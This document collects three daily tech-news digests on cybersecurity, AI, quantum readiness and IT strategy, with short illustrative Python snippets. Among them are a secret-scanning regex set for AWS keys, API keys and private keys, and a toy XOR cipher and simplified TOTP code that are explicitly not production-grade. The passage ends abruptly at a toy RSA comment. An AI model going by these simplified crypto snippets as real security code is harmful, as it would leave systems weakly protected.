
Daily Tech Digest - February 09, 2026


Quote for the day:

"Leaders who make their teams successful are followed even through the hardest journeys." -- Gordon Tredgold



Agentic AI upends SaaS models & sparks valuation shock

The Software-as-a-Service market is moving away from seat-based licensing as agentic artificial intelligence tools change how companies build and purchase business software, according to analysts and industry executives. Investors have already reacted to the shift. A broad sell-off in software stocks followed recent advances in agentic technology, raising questions regarding the durability of current business models. Concerns persist that traditional revenue streams may be at risk as autonomous systems perform increasing volumes of work with fewer human users. ... Not every vendor is well positioned for the transition. Industry observers are using the term "zombie SaaS" for companies that raised large rounds at peak valuations from 2020 to 2022 and now trade or transact below the total capital invested. These businesses often face a mismatch between historical expectations and current demand. They can struggle to raise new funding and may lack the growth rate needed to justify earlier valuations. Meanwhile, newer entrants can build competing products faster and at lower cost, increasing pressure on incumbents with larger cost structures. ... AI is also reshaping procurement decisions. Some companies are shifting toward internal tools as non-technical teams gain access to systems that generate software from natural-language prompts and templates. Industry discussion points to Ramp building internal revenue tools and AI agents in place of third-party software. 


Software developers: Prime cyber targets and a rising risk vector for CISOs

Attackers are increasingly targeting the tools, access, and trusted channels used by software developers rather than simply exploiting application bugs. The threats blend technical compromise — malicious packages, development pipeline abuse, etc. — with social engineering and AI-driven attacks. ... The tokens, API keys, cloud credentials, and CI/CD secrets held by software developers unlock far broader access than a typical office user account, making software engineers a prime target for cybercriminals. “They [developers] hold the keys to the kingdom, privileged access to source code and cloud infrastructure, making them a high-value target,” Wood adds. ... Attackers aren’t just looking for flaws in code — they’re looking for access to software development environments. Common security shortcomings, including overprivileged service accounts, long-lived tokens, and misconfigured pipelines, offer a ready means for illicit entry into sensitive software development environments. “Improperly stored access credentials are low-hanging fruit for even the most amateur of threat actors,” says Crystal Morin, senior cybersecurity strategist at cloud-native security and observability vendor Sysdig. ... AI-assisted development and “vibe coding” are increasing exposure to risk, especially because such code is often generated quickly without adequate testing, documentation, or traceability.
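The "improperly stored access credentials" problem Morin describes is exactly what secret-scanning tools hunt for. As a simplified illustration (the patterns below are toy stand-ins for the far richer rule sets shipped by real scanners such as gitleaks or trufflehog), a scanner is essentially pattern matching over source and configuration files:

```python
import re

# Illustrative patterns only -- real scanners ship hundreds of tuned rules.
SECRET_PATTERNS = {
    "aws_access_key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "generic_api_key": re.compile(
        r"(?i)api[_-]?key\s*[:=]\s*['\"][A-Za-z0-9]{20,}['\"]"
    ),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
}

def scan_text(text: str) -> list[str]:
    """Return the names of any secret patterns found in the given text."""
    return [name for name, pattern in SECRET_PATTERNS.items()
            if pattern.search(text)]

# A config line that embeds a long-lived credential vs. one that reads it
# from the environment at runtime:
leaked = 'aws_key = "AKIAABCDEFGHIJKLMNOP"'
clean = 'aws_key = os.environ["AWS_ACCESS_KEY_ID"]'
```

Running such a check in CI before every merge turns "low-hanging fruit" for attackers into a build failure for developers instead.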


How network modernization enables AI success and quantum readiness

In essence, inadequate networks limit the ability of AI “blood” to nourish the body of an organization — weakening it and stifling its growth. Many enterprise networks developed incrementally, with successive layers of technology implemented over time. Mergers, divestitures, and one-off projects to solve immediate problems have left organizations with a patchwork of architectures, vendors and configurations. ... As AI traffic increases across data centers, clouds, and the edge, blind spots multiply. Once-manageable technical debt becomes an active security liability, expanding the attack surface and undermining Zero Trust initiatives. ... Quantum computers could break today’s encryption standards, exposing sensitive financial, healthcare and operational data. Worse, attackers are already engaging in “harvest now, decrypt later” strategies — stealing encrypted data today to exploit tomorrow. The relevance to networking and AI issues is straightforward. Preparing for the challenges (and opportunities) of quantum computing will be an incremental, multi-year project that needs to start now. Enterprise IT infrastructures must be able to adapt and scale to quantum computing developments as they evolve. Companies will need to be able to “skate to where the puck will be,” and then skate again! While becoming quantum-safe may seem daunting, organizations don’t have to do it all at once.
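One practical first step toward incremental quantum-safety is crypto-agility: making the algorithm a labeled, swappable component rather than a hard-coded choice, so a post-quantum scheme can be dropped in later without a data-format change. A minimal sketch of the pattern follows; the "cipher" is a toy XOR stand-in (not real encryption), and every name is illustrative:

```python
# Registry of cipher implementations, keyed by an algorithm label that is
# stored alongside every ciphertext record.
CIPHERS = {}

def register(name):
    def deco(cls):
        CIPHERS[name] = cls
        return cls
    return deco

@register("classical-demo")
class XorCipher:
    """Toy stand-in for a classical cipher; NOT real encryption."""
    def __init__(self, key: bytes):
        self.key = key
    def encrypt(self, data: bytes) -> bytes:
        return bytes(b ^ self.key[i % len(self.key)]
                     for i, b in enumerate(data))
    decrypt = encrypt  # XOR is its own inverse

def seal(name: str, key: bytes, data: bytes) -> dict:
    """Encrypt and tag the record with the algorithm used."""
    return {"alg": name, "ct": CIPHERS[name](key).encrypt(data)}

def open_sealed(record: dict, key: bytes) -> bytes:
    """Decrypt using whatever algorithm the record says it was sealed with."""
    return CIPHERS[record["alg"]](key).decrypt(record["ct"])
```

Because each record carries its algorithm label, migrating to a quantum-safe scheme becomes a matter of registering a new cipher and re-sealing data over time, rather than a big-bang rewrite.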


Rethinking next-generation OT SOC as IT/OT convergence reshapes industrial cyber defense

Clear gains from next-generation OT SOC innovation emerge across real-world applications, such as OT-aware detection, AI-assisted triage, and distributed SOC models designed to reflect the day-to-day realities of operating critical infrastructure. ... The line between what is OT and what is IT is blurred. Each customer, scenario, and request for proposal shows a unique fingerprint of architectural, process, and industry-related concerns. Our OT SOC development program integrated industrial network sensors with the enterprise SOC, enabling holistic monitoring of plants and offices together. ... Risk is no longer discussed purely from a cyber perspective, but in terms of operational impact, safety, and reliability, which is more consequence-driven. When convergence is implemented securely, alerts are no longer investigated in isolation; identity, remote access activity, asset criticality, and process context are correlated together. ... From a practical standpoint, Mashirova said that automation delivers the most operational value in enrichment, correlation, prioritization, and workflow orchestration. “Automating asset context, vulnerability risk prioritization with remediation recommendations, alert deduplication, and escalation logic dramatically improves analyst efficiency without directly impacting the industrial process. AI agents can act as SOC assistants by correlating large volumes of data and providing decision support to analysts.”


Shai-hulud: The Hidden Cost of Supply Chain Attacks

In recent months, a somewhat novel supply chain threat has emerged against the open source community; attackers are unleashing self-propagating malware on component libraries and targeting downstream victims with infostealers. The most famous recent example of this is Shai-hulud, a worm targeting NPM projects that took hold when a victim downloaded a poisoned component. Once on a victim machine, the malware used its access to infect components that the victim maintains before self-publishing poisoned versions. ... Another consideration is long-term, lasting damage from these incidents. Sygnia's Kidron explains that the impact of a compromise like credential theft happens on a wider time scale. If the issue has not been adequately contained, attackers can sell access or use it for follow-on activity later. "In practice, damage unfolds across time frames. Immediately — within hours to the first few days after exposure, the primary risk is credential exposure: these campaigns are designed to execute inside developer and CI/CD paths where tokens and secrets are accessible," he says. "When those secrets leak, the downstream harm is not abstract — the attacker can use them (or sell them) to authenticate as the victim and access private repositories, pull data, tamper with code, trigger builds, publish packages, access cloud resources, or perform actions 'on behalf' of legitimate identities."


United Airlines CISO on building resilience when disruption is inevitable

Modernization in aviation is less about speed and more about precision. Every change must measurably improve safety, reliability, or resilience. Cybersecurity must respect that bar. ... Cyber risk is assessed in terms of how it affects the ability to move aircraft, crew, and passengers safely and on time. It also means cybersecurity leaders must understand the business end-to-end. You cannot protect an airline effectively without understanding flight operations, maintenance, weather, crew scheduling, and regulatory constraints. Cybersecurity becomes an enabler of safe operations, not a separate technical function. ... Risk assessment goes beyond vendor questionnaires. It includes scenario analysis, operational impact modeling, and close coordination with partners, regulators, and industry groups. Information sharing is essential, because early awareness often matters more than perfect control. Ultimately, we assume some disruptions will originate externally. The goal is to detect them quickly, understand their operational impact, and adapt without compromising safety. Resilience and coordination are just as important as contractual controls. ... Speed matters, but clarity matters more. We also plan extensively in advance. You cannot improvise under pressure when aircraft and passengers are involved. Clear playbooks, rehearsals, and defined decision authorities allow teams to act decisively while staying aligned with safety principles.


Securing IoT devices: why passwords are not enough

Traditional passwords are often not secure enough for technological devices or systems. Many consumers use the default password that comes with the system rather than changing it to a more secure one. When people update their passwords, they often choose weak ones that are easy for cyberattackers to crack. The volume of IoT devices makes manual password management inefficient and risky. A primary threat is the lack of encryption as data travels between networks. When multiple devices are connected, encryption is key to protecting information. Another threat is poor network segmentation, which leaves misconfigured or less secure devices on the same network as everything else. ... Adopting a zero-trust methodology is a better cybersecurity measure than traditional password-based systems. IoT devices can still require a password, but the system may ask for additional information to verify the user’s authorization. Users can set up passkeys, security questions or other methods as the next step after entering a password. ... AI can be used both offensively and defensively in cybersecurity for IoT devices. Hackers use AI to launch advanced attacks, but users can also implement AI to detect suspicious behaviour and address threats. Consumers can purchase AI security systems to safeguard their IoT devices beyond passwords, but they must remain vigilant and continuously monitor their usage to prevent cyberattackers from infiltrating them.
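The "password plus additional verification" flow described above can be sketched as a layered check in which the password alone never grants access. The following is a simplified TOTP-style illustration; real deployments should use an RFC 6238 library such as pyotp rather than hand-rolled code:

```python
import hashlib
import hmac
import time

def totp_code(secret: bytes, period: int = 30, digits: int = 6,
              now=None) -> str:
    """Simplified time-based one-time code (illustrative, not RFC-complete)."""
    counter = int((now if now is not None else time.time()) // period)
    digest = hmac.new(secret, counter.to_bytes(8, "big"),
                      hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                     # dynamic truncation
    code = int.from_bytes(digest[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

def verify_login(password_ok: bool, code: str, secret: bytes,
                 now=None) -> bool:
    """Layered check: a correct password alone is never sufficient."""
    return password_ok and hmac.compare_digest(code,
                                               totp_code(secret, now=now))
```

Because the code rotates every 30 seconds and is derived from a device-held secret, a leaked or default password by itself no longer opens the device.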


Creating a Top-Down and Bottom-Up Grounded Capability Model

A grounded capability model is a complete and stable set of these capabilities, structured in levels from level 1 to sometimes level 4 so senior leaders, middle managers, architects, and digital transformation managers can see the business as an integrated whole. The “grounded” part matters: it means the model reflects strategy and business design, not the quirks of today’s org chart or application portfolio. ... Business Architecture Info emphasizes that a grounded capability model is best built by combining top-down strategic direction with bottom-up operational reality. The top-down view ensures the model is aligned to the business plan and strategic goals, while the bottom-up view ensures it is validated against real value streams, objectives, and subject-matter expertise. ... Top-down capability modeling needs the right stakeholders and the right strategic inputs. On the stakeholder side, senior leaders are essential because they own direction, priorities, and the definition of “what good looks like.” The EA team, enterprise architects and business architects, translates that direction into a structured capability view. ... Bottom-up capability modeling grounds the model in delivery and operational truth. It relies heavily on middle managers, subject matter experts, and business experts. In other words, people who know how value is produced, where friction exists, and what “enablement” really takes. The EA team remains a key facilitator and modeler, but validation and discovery come from the business.


Secure The Path, Not The Chokepoint

The argument here is simple: baseline security policy should be enforced along the path where packets already travel. Programmable data planes, particularly P4 on programmable switching targets, make it possible to enforce meaningful guardrails at line rate, close to the workload, without redesigning the network into a set of security detours. ... When enforcement is concentrated on a few devices, the architecture depends on traffic detours or assumptions about where traffic flows. That creates three practical problems: First, important east-west traffic may never traverse an inspection point. Second, response actions often depend on where a firewall sits rather than where the attacker is operating. Third, changes become slow and risky because every new workload pattern becomes another exception. ... A fabric-first model succeeds when it focuses on controls that are simple, universal, and have a high impact. ... A fabric-first approach does not remove the need for firewalls. Deep application inspection, proxy functions, content controls, and specialized policy workflows still make sense where rich context exists and where inspection overhead is acceptable. The shift is about default placement. Baseline guardrails and rapid containment belong in the fabric. ... A small set of metrics usually tells the story clearly: time from detection to enforced containment, reduction in unintended internal connection attempts, and time to produce a credible incident narrative during review.
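The match-action idea behind fabric enforcement can be modeled in a few lines of software. This is only a toy sketch (real P4 targets compile such tables into hardware pipelines evaluated at line rate, and all addresses and actions below are invented):

```python
from ipaddress import ip_address, ip_network

class GuardrailTable:
    """Toy match-action table: first matching rule wins, else default."""
    def __init__(self, default_action="forward"):
        self.rules = []
        self.default_action = default_action

    def add_rule(self, src, dst, port, action):
        # port=None acts as a wildcard on the destination port
        self.rules.append((ip_network(src), ip_network(dst), port, action))

    def apply(self, src, dst, port):
        for src_net, dst_net, rule_port, action in self.rules:
            if (ip_address(src) in src_net and ip_address(dst) in dst_net
                    and (rule_port is None or rule_port == port)):
                return action
        return self.default_action

fabric = GuardrailTable()
# Baseline guardrail: workstations may never reach the management plane.
fabric.add_rule("10.1.0.0/16", "10.99.0.0/24", None, "drop")
# Rapid containment: quarantine a single compromised host in place.
fabric.add_rule("10.1.5.23/32", "0.0.0.0/0", None, "quarantine")
```

The point of the sketch is placement: because every packet already crosses the fabric, these baseline rules apply to all east-west traffic without detouring flows through a chokepoint.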


Banks Face Dual Authentication Crisis From AI Agents

Traditional authentication relies upon point-in-time verification like MFA and a password, after which access is granted. Over the years, banks have analyzed human spending patterns. But AI agents purchasing around the clock and seeking optimal deals have rendered that model obsolete. "With autonomous agents transacting on behalf of users, the distinction between legitimate and fraudulent activity is blurred, and a single compromised identity could trigger automated losses at scale," said Ajay Patel, head of agentic commerce at Prove. ... But before banks can address the authentication problem, they need to fix their data infrastructure, said Carey Ransom, managing director at BankTech Ventures. AI agents need clean, contextually appropriate data, and banks don't yet have standardized ways to provide it. So, when mistakes occur, who is at fault, and who is liable for making things right? When AI agents can spawn sub-agents that delegate tasks to other AI systems throughout a transaction chain, the liability question gets murky. ... Layered authentication that balances security with speed will reduce agentic AI risks, Ransom said. "Variant transaction requests might require a new layer or type of authentication to ensure it is legitimate and reflecting the desired activity," he said. "Checks and balances will be a prevailing approach to protect both sides, while still enabling the autonomy and efficiency the market desires."
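Ransom's point about variant transactions triggering extra authentication layers can be sketched as a simple policy function. Everything here is hypothetical (the thresholds, field names, and layer names are invented for illustration, not any bank's actual policy):

```python
def required_auth_layers(tx: dict, profile: dict) -> list[str]:
    """Decide which authentication layers an agent transaction must clear."""
    layers = ["agent_credential"]          # point-in-time check, always required
    if tx["amount"] > profile["typical_max_amount"]:
        layers.append("spending_limit_confirmation")
    if tx["merchant"] not in profile["known_merchants"]:
        layers.append("user_step_up")      # route back to the human principal
    return layers

# Illustrative user profile and two agent-initiated transactions:
profile = {"typical_max_amount": 200.0,
           "known_merchants": {"grocer", "utility"}}
routine = {"amount": 45.0, "merchant": "grocer"}
variant = {"amount": 900.0, "merchant": "new-electronics-shop"}
```

Routine agent purchases pass on the base credential alone, preserving autonomy and speed, while the variant transaction escalates back to the human, which is the "checks and balances" pattern the quote describes.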

Daily Tech Digest - October 06, 2025


Quote for the day:

"Success seems to be connected with action. Successful people keep moving. They make mistakes but they don’t quit." -- Conrad Hilton


Beyond Von Neumann: Toward a unified deterministic architecture

In large AI workloads, datasets often cannot fit into caches, and the processor must pull them directly from DRAM or HBM. Accesses can take hundreds of cycles, leaving functional units idle and burning energy. Traditional pipelines stall on every dependency, magnifying the performance gap between theoretical and delivered throughput. Deterministic Execution addresses these challenges in three important ways. First, it provides a unified architecture in which general-purpose processing and AI acceleration coexist on a single chip, eliminating the overhead of switching between units. Second, it delivers predictable performance through cycle-accurate execution, making it ideal for latency-sensitive applications such as large language model (LLM) inference, fraud detection and industrial automation. Finally, it reduces power consumption and physical footprint by simplifying control logic, which in turn translates to a smaller die area and lower energy use. ... For enterprises deploying AI at scale, architectural efficiency translates directly into competitive advantage. Predictable, latency-free execution simplifies capacity planning for LLM inference clusters, ensuring consistent response times even under peak loads. Lower power consumption and reduced silicon footprint cut operational expenses, especially in large data centers where cooling and energy costs dominate budgets.


Invest in quantum adoption now to be a winner in the quantum revolution

History shows that transformative compute paradigms require years of preparation before delivering real returns. Graphics processing units (GPUs), for example, took more than a decade of groundwork before fueling the AI revolution that now powers almost every sector of the economy. Organizations that invested early positioned themselves to capture this growth, while those who waited paid more, were caught flat-footed, and lost ground to competitors. Quantum will follow the same trajectory. ... Investing in readiness today reduces both risk and cost. By spreading integration work over time, organizations avoid the disruption and price premium of a sudden adoption push once the full enterprise value of quantum computing is achieved. Budget holders know that rushed, unplanned programs often exceed forecasts and erode margins. Smaller projects with clear deliverables can be managed within existing budgets and allow lessons to be learned incrementally, lowering both financial exposure and operational risk. For decision-makers, this creates a predictable investment profile rather than a costly “big bang” rollout. Early engagement also builds skills at a fraction of the future cost. Recruiting or retraining talent under pressure once the market overheats will be significantly more expensive. 


What an IT career will look like in 5 years — and how to thrive through the changes

Success in the near future will depend less on narrow expertise — mastering a specific technology stack for example — and more on evaluating, adapting, and applying the right tools to solve organizational problems. “People shift into cloud, security, data, or AI work depending on business need,” says Chris Camacho, COO and co-founder at Abstract Security. “Titles matter less than visible proof-of-work — small wins shared internally or publicly. Pick a lane and go deep, then layer AI expertise on top. And show your work — on GitHub, LinkedIn, wherever recruiters can see results.” Justina Nixon-Saintil, global chief impact officer at IBM, says success in the future will favor those who are adaptable and use AI to amplify creativity rather than replace it. “Technology roles are evolving from traditional tasks into more dynamic, interdisciplinary pathways that blend technical expertise with strategic thinking,” Nixon-Saintil says. “Those who can navigate the ethical challenges of AI and technology will succeed, leveraging innovation responsibly to solve complex problems and anticipate evolving business needs. You’ll not only future-proof your career but also unlock new opportunities for growth and innovation.” Beth Scagnoli, vice president of product management at Redpoint Global, agrees the successful pro of the near future will easily move between related but traditionally separate IT domains, such as system architecture and development.


Using AI as a Therapist? Why Professionals Say You Should Think Again

It can be incredibly tempting to keep talking to a chatbot. When I conversed with the "therapist" bot on Instagram, I eventually wound up in a circular conversation about the nature of "wisdom" and "judgment," because I was asking the bot questions about how it could make decisions. This isn't really what talking to a therapist should be like. Chatbots are tools designed to keep you chatting, not to work toward a common goal. One advantage of AI chatbots in providing support and connection is that they're always ready to engage with you. That can be a downside in some cases, where you might need to sit with your thoughts, Nick Jacobson, an associate professor of biomedical data science and psychiatry at Dartmouth, told me recently.  ... While chatbots are great at holding a conversation -- they almost never get tired of talking to you -- that's not what makes a therapist a therapist. They lack important context or specific protocols around different therapeutic approaches, said William Agnew, a researcher at Carnegie Mellon University and one of the authors of the recent study alongside experts from Minnesota, Stanford and Texas. "To a large extent it seems like we are trying to solve the many problems that therapy has with the wrong tool," Agnew told me. "At the end of the day, AI in the foreseeable future just isn't going to be able to be embodied, be within the community, do the many tasks that comprise therapy that aren't texting or speaking."


CISOs rethink the security organization for the AI era

“Organizations that have invested in security over time are seeing efficiencies by layering AI-driven tools into their workflows,” Oleksak says. “But those who haven’t taken security seriously are still stuck with the same exposures they’ve always had. AI doesn’t magically catch them up.” In fact, because attackers are using AI to make phishing, scanning, and deepfakes cheaper and faster, Oleksak adds, the gap between mature and unprepared organizations is widening. ... “We’re now embedding cybersecurity into AI initiatives from the start, working closely across teams to ensure innovation is both safe and ethical,” she stresses. “Our commitment to responsible AI means every solution is designed with transparency, fairness, and accountability in mind.” Jason Lander, senior vice president of product management at Aya Healthcare, who manages security for the organization, is also seeing a change in the dynamics between cybersecurity and IT. “AI is noticeably reshaping how security and IT departments collaborate, streamline workflows, blend responsibilities, make decisions and redefine trust dynamics,” he says.  ... “IT’s focus is on speed, efficiency, and enabling the business, while the CISO’s focus is on protecting the business. That distinction is often misunderstood,” he maintains. “As AI introduces powerful new risks, from deepfakes and AI-driven phishing to employees unintentionally exposing sensitive IP through AI queries, only the CISO is positioned to anticipate and mitigate these threats.”


Why Secure Data Migration is the Next Big Boardroom Priority

Industries with the highest dependency on sensitive data are leading the way in secure migration. Financial services, with their heavy regulatory responsibilities and high stakes for customer trust, are among the most proactive industries when it comes to secure data migration. Banks moving from legacy mainframes to cloud-native platforms know that a single misstep could cascade into systemic risk. Healthcare, another high-stakes sector, faces similar urgency. ... Technology hyperscalers such as Microsoft, Google, and Amazon Web Services (AWS) play a dual role: enablers of secure migration and, simultaneously, critical dependencies for enterprises. This reliance brings resilience but also concentration risk. Many CIOs remain concerned about vendor lock-in, even as few alternatives exist at a comparable scale. Enterprises must therefore ensure secure migration while also diversifying their strategy to avoid overreliance on a single ecosystem. ... The shift is clear: secure data migration is no longer an IT department problem. It is a board-level agenda item, shaping strategy and shareholder value. As per the latest findings, 82% of CISOs now directly report to the CEO, underscoring their elevated importance. The World Economic Forum has gone further, warning in its 2025 Global Risks Report that data migration failures represent an underappreciated threat to global business resilience.


How self-learning AI agents will reshape operational workflows

Experience-based training for AI agents offers strong potential because it allows agents to act autonomously in real-world situations, guided by rewards that emerge from the environment. In the context of operations management, this means agents can learn from past incidents, events, customer tickets, application and infrastructure metrics and logs, as well as any other metrics made available to them. While modern-day hype cycles demand rapid results, much of the promise of AI agents lies in how they will improve operations management over time. Given enough time and training data, the AI agent will be able to plan actions and predict their consequences in the environment—i.e., predict the reward—much better than a human. ... Experience-based learning in this context requires human engineers to conduct post-incident reviews to understand an incident and establish actions to prevent that incident from recurring. However, in many cases, the learnings from a post-incident review are siloed to individual teams and not shared with the wider organization. ... Given that organizations do not consistently conduct post-incident learning reviews or share their findings across the wider organization, operations management is ripe for “agentification” powered by self-learning agents. Instead of burdening busy human engineers with post-incident reviews, AI agents can conduct these reviews and then apply this valuable experience-based training data. 
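The experience-based, reward-driven learning described above is the classic reinforcement-learning loop. As a hedged sketch of the idea (the incident types, remediation actions, and rewards below are invented; a production system would derive them from post-incident reviews, tickets, and telemetry), a minimal tabular learner looks like this:

```python
import random
from collections import defaultdict

random.seed(0)  # deterministic demo

# Toy "environment": the reward observed when an action is applied
# to an incident type. In reality this signal would come from whether
# the remediation actually resolved the incident.
REWARDS = {
    ("disk_full", "rotate_logs"): 1.0,
    ("disk_full", "restart_service"): -0.5,
    ("memory_leak", "restart_service"): 1.0,
    ("memory_leak", "rotate_logs"): -0.5,
}
ACTIONS = ["rotate_logs", "restart_service"]
q = defaultdict(float)          # learned value of each (incident, action)
alpha, epsilon = 0.2, 0.1       # learning rate, exploration rate

for _ in range(500):            # replayed incident episodes
    incident = random.choice(["disk_full", "memory_leak"])
    if random.random() < epsilon:                       # explore occasionally
        action = random.choice(ACTIONS)
    else:                                               # else exploit
        action = max(ACTIONS, key=lambda a: q[(incident, a)])
    reward = REWARDS[(incident, action)]
    q[(incident, action)] += alpha * (reward - q[(incident, action)])

def best_action(incident: str) -> str:
    """The agent's learned recommendation for an incident type."""
    return max(ACTIONS, key=lambda a: q[(incident, a)])
```

After enough episodes, the agent's value table encodes what post-incident reviews would otherwise capture, and, unlike siloed review documents, it is applied automatically on the next occurrence.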


The DPDPA’s impact on law firms

Most of the personal data processing in HR departments is for purposes related to employment. The DPDPA does provide an exemption from obtaining consent for employment purposes under Sec. 7(i) ... However, a reading of this Section would indicate that this exemption is applicable only to current employees and it excludes all processing which happens post-employment or pre-employment. In some instances, where an employee or intern voluntarily emails their resumes to HR departments and the HR departments do not consider the application or take any action on the resume received through email, DPDPA compliance will not kick in as the DPDPA does not apply to personal data which is provided voluntarily by a data principal. But HR departments will need to be vigilant about data collected through designated online portals available on their websites, as in such a case, they can be said to be actively inviting applications unlike the former scenario wherein a candidate is voluntarily sharing their data. ... Under Section 3 of the DPDPA, any foreign entity offering services to individuals in India falls within the law’s extra-territorial scope. ... Several law firms in India have shown significant efforts in enhancing operational standards to ensure that client and partner data is handled safely. Several law firms have implemented standards like ISO 27001, which improves information security, risk management and compliance with regulations.



Is quantum computing poised for another breakthrough?

“Almost all of us in the quantum computing field are absolutely convinced,” Kulkarni said. “But even the skeptics who always thought this was something of the future and never really going to materialize, I think, can concur with us that this is going to happen.” ... Quantum processors currently provide physicists and other scientists with the tools to do big research projects that simply aren’t realistic with other computers. That’s the main use of the technology for now, Boixo said, but as things continue to move forward, the pool of who will use quantum computers will grow. Of course, it’s not just scientists trying to uncover the limits of quantum technology who are using the computers. Marc Lijour, a researcher with the Institute of Electrical and Electronics Engineers, told IT Brew that attackers are interested in how quantum computers can potentially crack encryption much faster than traditional computers. They’re probably already playing with the technology, and waiting until the computers are widely available. “Attackers…are downloading everything they can at the moment and storing it, basically copying the internet and anything they can so they can open it later [using quantum technology],” Lijour said. That’s still a ways in the future. Boixo estimated chaining together 50–100 logical qubits is about five or so years away. With a number of firms looking at developing the next level of quantum computing, it’s a race. 


CISO Spotlights Cybersecurity Challenges in Education Following Kido Breach

Budget is certainly going to be a challenge for all, but more so for state-funded schools and organizations. We do see that as being a challenge everywhere; they have limited resources. The overwhelming feedback is that they just don't have any money to spend, and it's perceived, therefore, that they can't deploy the security controls that they need. That's a big thing, but I think an even bigger issue is the lack of expertise and time. On lots of occasions you’ll discover institutions where there just aren’t experts on the ground that can manage these cybersecurity risks. They often lean on IT service providers and assume that they’re doing something about cybersecurity, whereas that is not necessarily the case. Budget, expertise and time are big constraints, and I think those issues are causing so many schools to be vulnerable. ... There are plenty of things that can be done with little or no cost. Reviewing all the users, identifying who’s got access and making sure MFA is turned on doesn't carry a significant cost beyond somebody taking the time to do it. That’s going to have a material impact on their posture. Most schools will have an awareness training program, but it's probably a tick box exercise where somebody has to do the course when they join and that’s it. Assigning one person to really own and champion that program could make a material difference to peoples’ awareness.

Daily Tech Digest - August 16, 2025


Quote for the day:

"Develop success from failures. Discouragement and failure are two of the surest stepping stones to success." -- Dale Carnegie


Digital Debt Is the New Technical Debt (And It’s Worse)

Digital debt doesn’t just slow down technology. It slows down business decision-making and strategic execution. Decision-Making Friction: Simple business questions require data from multiple systems. “What’s our customer lifetime value?” becomes a three-week research project because customer data lives in six different platforms with inconsistent definitions. Campaign Launch Complexity: Marketing campaigns that should take two weeks to launch require six weeks of coordination across platforms. Not because the campaign is complex, but because the digital infrastructure is fragmented. Customer Experience Inconsistency: Customers encounter different branding, messaging, and functionality depending on which digital touchpoint they use. Support teams can’t access complete customer histories because data is distributed across systems. Innovation Paralysis: New initiatives get delayed because teams spend time coordinating existing systems rather than building new capabilities. Digital debt creates a gravitational pull that keeps organizations focused on maintenance rather than innovation. ... Digital debt is more dangerous than technical debt because it’s harder to see and affects more stakeholders. Technical debt slows down development teams. Digital debt slows down entire organizations.


Rising OT threats put critical infrastructure at risk

Attackers are exploiting a critical remote code execution (RCE) vulnerability in the Erlang programming language's Open Telecom Platform, widely used in OT networks and critical infrastructure. The flaw enables unauthenticated users to execute commands through SSH connection protocol messages that should be processed only after authentication. Researchers from Palo Alto Networks' Unit 42 said they have observed more than 3,300 exploitation attempts since May 1, with about 70% targeting OT networks across healthcare, agriculture, media and high-tech sectors. Experts urged affected organizations to patch immediately, calling it a top priority for any security team defending an OT network. The flaw, which has a CVSS score of 10, could enable an attacker to gain full control over a system and disrupt connected systems -- particularly worrisome in critical infrastructure. ... Despite its complex cryptography, the protocol contains design flaws that could enable attackers to bypass authentication and exploit outdated encryption standards. Researcher Tom Tervoort, a security specialist at Netherlands-based security company Secura, identified issues affecting at least seven different products, resulting in the issuing of three CVEs.


Why Tech Debt is Eating Your ROI (and How To Fix It)

Regardless of industry or specific AI efforts, these frustrations seem to boil down to the same culprit: AI initiatives continue to stumble over decades of accumulated tech debt. Part of the reason is that, despite the hype, most organizations use AI — let’s say, timidly. Fewer than half employ it for predictive maintenance or detecting network anomalies. Fewer than a third use it for root-cause analysis or intelligent ticket routing. Why such hesitation? Because implementing AI effectively means confronting all the messiness that came before. It means admitting our tech environments need a serious cleanup before adding another layer of complexity. Tech complexity has become a monster. This mess came from years of bolting on new systems without retiring old ones. Some IT professionals point to redundant applications as a major source of wasted budget, and others blame overprovisioning in the cloud — the digital equivalent of paying rent on empty apartments. ... IT teams admit something that, to me, is alarming: Their infrastructure has grown so tangled they can no longer maintain basic security practices. Let that sink in. Companies with eight-figure tech budgets can’t reliably patch vulnerable systems or implement fundamental security controls. No one builds silos deliberately. Silos emerge from organizational boundaries, competing priorities and the way we fund and manage projects. 


Ready on paper, not in practice: The incident response gap in Australian organisations

The truth is, security teams often build their plans around assumptions rather than real-world threats and trends. That gap becomes painfully obvious during an actual incident, when organisations realise they aren't adequately prepared to respond. Recent findings of a Semperis study titled The State of Enterprise Cyber Crisis Readiness revealed a strong disconnect between organisations' perceived readiness to respond to a cyber crisis and their actual performance. The study also showed that cyber incident response plans are being implemented and regularly tested, but not broadly. In a real-world crisis, too many teams are still operating in silos. ... A robust, integrated, and well-practiced cyber crisis response plan is paramount for cyber and business resilience. After all, the faster you can respond and recover, the less severe the financial impact of a cyberattack will be. Organisations can increase their agility by conducting tabletop exercises that simulate attacks. By practicing incident response regularly and introducing a range of new scenarios of varying complexity, organisations can train for the real thing, which can often be unpredictable. Security teams can continually adapt their response plans based on the lessons learned during these exercises, and any new emerging cyber threats.


Quantum Threat Is Real: Act Now with Post Quantum Cryptography

Some of the common types of encryption we use today include RSA (Rivest-Shamir-Adleman), ECC (Elliptic Curve Cryptography), and DH (Diffie-Hellman Key Exchange). RSA and ECC are asymmetric encryption schemes, while Diffie-Hellman is a key-agreement protocol that lets two parties establish a shared secret over an insecure channel. RSA’s security rests on the difficulty of factoring very large integers, and ECC’s on the hardness of the elliptic curve discrete logarithm problem. Both problems are computationally infeasible for traditional computers, which is what keeps these schemes secure today. ... Cybercriminals think long-term. They are well aware that quantum computing is still some time away. But that doesn’t stop them from stealing encrypted information. Why? They will store it securely until quantum computing becomes readily available; then they will decrypt it. The impending arrival of quantum computers has set the cat amongst the pigeons. ... Blockchain is not unhackable, but it is difficult to hack. A set of cryptographic algorithms keeps it secure, including SHA-256 (Secure Hash Algorithm 256-bit) and ECDSA (Elliptic Curve Digital Signature Algorithm). Today, cybercriminals might not attempt to target blockchains and steal crypto. But tomorrow, with the availability of a quantum computer, the crypto vault could be broken into without trouble. ... We keep saying that quantum computing and quantum computing-enabled threats are still some time away. And this is true. But when the technology is here, it will evolve and gain traction. 
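To make the factoring dependence concrete, here is a toy RSA sketch (my own illustration, not from the article) using deliberately tiny textbook primes. A classical computer factors this modulus instantly; at real key sizes (2048 bits and up) the same trial-division attack is hopeless, and it is precisely that assumption that Shor's algorithm on a quantum computer would undo.

```python
# Toy RSA with deliberately tiny primes, to show why the scheme stands or
# falls with the hardness of factoring. Illustration only, never real crypto.

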